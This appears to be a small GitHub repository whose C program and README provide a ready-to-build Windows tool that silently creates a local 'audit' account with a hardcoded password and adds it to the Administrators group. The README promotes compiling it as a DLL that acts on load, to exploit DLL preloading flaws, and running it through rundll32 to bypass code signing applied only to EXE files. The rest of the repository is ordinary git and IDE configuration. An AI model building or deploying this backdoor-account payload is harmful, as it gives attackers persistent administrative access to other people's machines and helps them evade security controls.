├── .gitattributes ├── README.md ├── .gitignore └── adduser.c /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # adduser 2 | 3 | Programmatically creates a 'local admin' Windows user. Requires admin rights. The created user is hardcoded to the following: 4 | 5 | Login: `audit` 6 | Password: `Test123456789!` (this should be good enough to fit most password policies) 7 | 8 | This standalone piece of code can run in many contexts: 9 | - As a command-line EXE. 10 | - As a DLL (the user will be created on DLL load). This is useful to exploit "DLL Preloading" issues. 11 | - As a DLL, through `rundll32.exe adduser.dll,CreateAdminUser@16`. This is useful to bypass mandatory code signing applied to EXE files only. 
12 | 13 | ## Compiling 14 | ### Using MinGW (tested on macOS, but Linux should work) 15 | 16 | - Create a 32-bit EXE file: 17 | `i686-w64-mingw32-gcc -oadduser32.exe adduser.c -lnetapi32` 18 | - Create a 32-bit DLL file: 19 | `i686-w64-mingw32-gcc -shared -oadduser32.dll adduser.c -lnetapi32` 20 | - Create a 64-bit EXE file: 21 | `x86_64-w64-mingw32-gcc -oadduser64.exe adduser.c -lnetapi32` 22 | - Create a 64-bit DLL file: 23 | `x86_64-w64-mingw32-gcc -shared -oadduser64.dll adduser.c -lnetapi32` 24 | 25 | ### Using Visual Studio (tested with VS2013) 26 | 27 | - Create an EXE file: 28 | `cl.exe adduser.c /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32` 29 | - Create a DLL file: 30 | `cl.exe adduser.c /LD /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32` -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | 5 | *.pydevproject 6 | .project 7 | .metadata 8 | bin/ 9 | tmp/ 10 | *.tmp 11 | *.bak 12 | *.swp 13 | *~.nib 14 | local.properties 15 | .classpath 16 | .settings/ 17 | .loadpath 18 | 19 | # External tool builders 20 | .externalToolBuilders/ 21 | 22 | # Locally stored "Eclipse launch configurations" 23 | *.launch 24 | 25 | # CDT-specific 26 | .cproject 27 | 28 | # PDT-specific 29 | .buildpath 30 | 31 | 32 | ################# 33 | ## Visual Studio 34 | ################# 35 | 36 | ## Ignore Visual Studio temporary files, build results, and 37 | ## files generated by popular Visual Studio add-ons. 
38 | 39 | # User-specific files 40 | *.suo 41 | *.user 42 | *.sln.docstates 43 | 44 | # Build results 45 | [Dd]ebug/ 46 | [Rr]elease/ 47 | *_i.c 48 | *_p.c 49 | *.ilk 50 | *.meta 51 | *.obj 52 | *.pch 53 | *.pdb 54 | *.pgc 55 | *.pgd 56 | *.rsp 57 | *.sbr 58 | *.tlb 59 | *.tli 60 | *.tlh 61 | *.tmp 62 | *.vspscc 63 | .builds 64 | *.dotCover 65 | 66 | ## TODO: If you have NuGet Package Restore enabled, uncomment this 67 | #packages/ 68 | 69 | # Visual C++ cache files 70 | ipch/ 71 | *.aps 72 | *.ncb 73 | *.opensdf 74 | *.sdf 75 | 76 | # Visual Studio profiler 77 | *.psess 78 | *.vsp 79 | 80 | # ReSharper is a .NET coding add-in 81 | _ReSharper* 82 | 83 | # Installshield output folder 84 | [Ee]xpress 85 | 86 | # DocProject is a documentation generator add-in 87 | DocProject/buildhelp/ 88 | DocProject/Help/*.HxT 89 | DocProject/Help/*.HxC 90 | DocProject/Help/*.hhc 91 | DocProject/Help/*.hhk 92 | DocProject/Help/*.hhp 93 | DocProject/Help/Html2 94 | DocProject/Help/html 95 | 96 | # Click-Once directory 97 | publish 98 | 99 | # Others 100 | [Bb]in 101 | [Oo]bj 102 | sql 103 | TestResults 104 | *.Cache 105 | ClientBin 106 | stylecop.* 107 | ~$* 108 | *.dbmdl 109 | Generated_Code #added for RIA/Silverlight projects 110 | 111 | # Backup & report files from converting an old project file to a newer 112 | # Visual Studio version. 
Backup files are not needed, because we have git ;-) 113 | _UpgradeReport_Files/ 114 | Backup*/ 115 | UpgradeLog*.XML 116 | 117 | 118 | 119 | ############ 120 | ## Windows 121 | ############ 122 | 123 | # Windows image file caches 124 | Thumbs.db 125 | 126 | # Folder config file 127 | Desktop.ini 128 | 129 | 130 | ############# 131 | ## Python 132 | ############# 133 | 134 | *.py[co] 135 | 136 | # Packages 137 | *.egg 138 | *.egg-info 139 | dist 140 | build 141 | eggs 142 | parts 143 | bin 144 | var 145 | sdist 146 | develop-eggs 147 | .installed.cfg 148 | 149 | # Installer logs 150 | pip-log.txt 151 | 152 | # Unit test / coverage reports 153 | .coverage 154 | .tox 155 | 156 | #Translations 157 | *.mo 158 | 159 | #Mr Developer 160 | .mr.developer.cfg 161 | 162 | # Mac crap 163 | .DS_Store 164 | -------------------------------------------------------------------------------- /adduser.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ADDUSER.C: creating a Windows user programmatically. 
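/*
 * ADDUSER.C: creating a Windows user programmatically.
 *
 * Creates the local account "audit" with a fixed password and adds it to
 * the local "Administrators" group.  Requires administrative rights.
 * The same helper is reached from three entry points: a console EXE
 * (main), a DLL that acts on load (DllMain) and a rundll32 target
 * (CreateAdminUser).
 *
 * NOTE(review): both NetUserAdd and NetLocalGroupAddMembers are audited
 * account-management operations; on hosts with account-management auditing
 * enabled they show up in the Security event log (user-created and
 * local-group-membership-changed events).
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>
#include <tchar.h>

/* Element count of a true array (not valid on a pointer/parameter). */
#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))

/* Account that is created; the name is used for both creation and lookup. */
#define ADDUSER_NAME     _T("audit")
#define ADDUSER_PASSWORD _T("Test123456789!")

/*
 * Create the "audit" user and make it a member of the local Administrators
 * group.
 *
 * Returns 0 on success, otherwise the NET_API_STATUS or Win32 error code of
 * the first failing step (also printed to stdout).  If a step after
 * NetUserAdd fails the account is left in place, created but not elevated;
 * there is no rollback.
 */
DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    /* Large enough for any SID; LookupAccountName takes this size in bytes. */
    BYTE Sid[256];
    DWORD cbSid = sizeof(Sid);

    /* LookupAccountName takes the domain size in TCHARs, not in bytes. */
    TCHAR Domain[256];
    DWORD cbDomain = ARRAY_SIZE(Domain);

    /*
     * Create user
     * http://msdn.microsoft.com/en-us/library/aa370649%28v=VS.85%29.aspx
     */
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name = ADDUSER_NAME;                    // username
    ud.usri1_password = ADDUSER_PASSWORD;            // password
    ud.usri1_priv = USER_PRIV_USER;                  // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT;  // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,          // local server
        1,             // information level
        (LPBYTE)&ud,
        NULL           // error value
    );

    if (rc != NERR_Success) {
        /* NET_API_STATUS is a DWORD (unsigned long): %lu/%lx, not %d/%x. */
        _tprintf(_T("NetUserAdd FAIL %lu 0x%08lx\r\n"), rc, rc);
        return rc;
    }

    /*
     * Get user SID
     * http://msdn.microsoft.com/en-us/library/aa379159(v=vs.85).aspx
     */
    BOOL b = LookupAccountName(
        NULL,          // local server
        ADDUSER_NAME,  // account name
        Sid,           // SID
        &cbSid,        // SID size (bytes)
        Domain,        // Domain
        &cbDomain,     // Domain size (TCHARs)
        &snu           // SID_NAME_USE (enum)
    );

    if (!b) {
        DWORD dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %lu 0x%08lx\r\n"), dw, dw);
        return dw;
    }

    /*
     * Add user to "Administrators" local group
     * http://msdn.microsoft.com/en-us/library/aa370436%28v=VS.85%29.aspx
     */
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                  // local server
        _T("Administrators"),
        0,                     // information level
        (LPBYTE)&gd,
        1                      // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %lu 0x%08lx\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

/*
 * DLL entry point: the user is created when the DLL is attached to a
 * process.  The helper's result cannot be surfaced from here and is
 * ignored; the DLL always reports successful load.
 *
 * NOTE(review): this runs during loader initialisation (under the loader
 * lock) — keep in mind when reasoning about what the call can do here.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        CreateAdminUserInternal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        break;
    }
    return TRUE;
}

/*
 * RUNDLL32 entry point.  The signature is dictated by rundll32:
 * https://support.microsoft.com/en-us/help/164787/info-windows-rundll-and-rundll32-interface
 * All four arguments (including the command line) are ignored.
 */

#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    (void)hwnd;
    (void)hinst;
    (void)lpszCmdLine;
    (void)nCmdShow;

    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

/*
 * Command-line entry point.  Exit status is 0 on success, otherwise the
 * error code of the failing step (DWORD narrowed to int).
 */
int main(void)
{
    return (int)CreateAdminUserInternal();
}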